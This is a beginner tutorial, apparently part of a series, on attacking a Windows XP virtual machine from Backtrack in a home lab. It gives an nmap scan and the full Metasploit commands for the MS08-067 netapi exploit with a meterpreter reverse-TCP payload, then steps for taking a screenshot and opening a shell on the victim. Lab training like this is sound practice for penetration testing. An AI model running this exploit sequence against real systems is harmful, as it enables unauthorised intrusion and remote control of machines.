In Part 1, we learnt how to setup a hacking lab to practice hacking since our objective is to hack without disrupting any real network or services. Now, in this article, I will discuss ways to actually start hacking on your own. Please note that I will be using Metasploit as the primary hacking tool. Metasploit is a huge collection of ready-to-use exploits which makes life easier for a penetration tester or ethical hacker. Metasploit comes pre-installed with Backtrack, so you don't need to do any extra installation. However, if you want to use a Windows machine as the attacker machine, you can download Metasploit for windows also (around 390MB).
In this hack, I will be hacking Windows XP using the famous netapi exploit.(don’t worry if you don’t know what that is). I'm showing this exploit because it works every time, and it is easy to demonstrate, especially for beginners.
I will be using Backtrack as an attacker and Windows XP as a victim as configured in part 1.
Startup the Backtrack Machine and login with the username- root and password- toor
After that, type startx to start the GUI window. Now, you are greeted with the Backtrack Interface. You can browse through all the menus and try out all the tools.
First, we will perform a port scan to see open ports and (hopefully) find out the victim's Operating System. Type nmap -O 192.168.56.106 like so-
Now, we know that our victim is Running Windows XP SP2 or Windows Server 2003 and the port 445 is open. So, we can run the netapi exploit using Metaspolit.
Alternatively, you can open a terminal and type- msfconsole
You now have the Metasploit console open and can start typing in commands.
Type the following-
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.101
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.106
msf exploit(ms08_067_netapi) > exploit
Note: LHOST means your IP address. RHOST means the victim's IP address.
After typing all that, if you see a meterpreter shell open like below, then congratulations!
It means you were successful in exploiting the XP system.
Meterpreter is a reverse shell we opened after exploiting the victim's computer. Now that you have a Meterpreter shell, you can do virtually anything with that system.
Type help to see all available commands.
Lets grab a screenshot of the victim, type screenshot
In order to get the command prompt of the remote system, type shell. After you get shell, type ipconfig to prove that you are indeed in the XP system. You can now do virtually anything with the system.
If you have done all the steps correctly, then you just managed your first actual hack with Metasploit. This is just the beginning. You can find more exploits for Windows XP and Windows 7 also. Install a Windows 7 virtual machine and keep trying out new exploits. In this tutorial, we learnt how to use Metasploit to run a basic exploit to hack a remote computer in the LAN, which means you successfully performed your first network hack. I highly suggest you try out this hack as it will really help you in getting started in the world of hacking.
In order to learn more about Metasploit, you can visit www.securitytube.net.
Note: You have to regularly update Metasploit to get the latest exploits by typing - msfupdate. However, since we have used VirtualBox Host Only Adapter, there is no internet connectivity. In order to connect BackTrack to the internet, power it off and reset the Adapter to NAT (In Network Settings, VirtualBox Menu)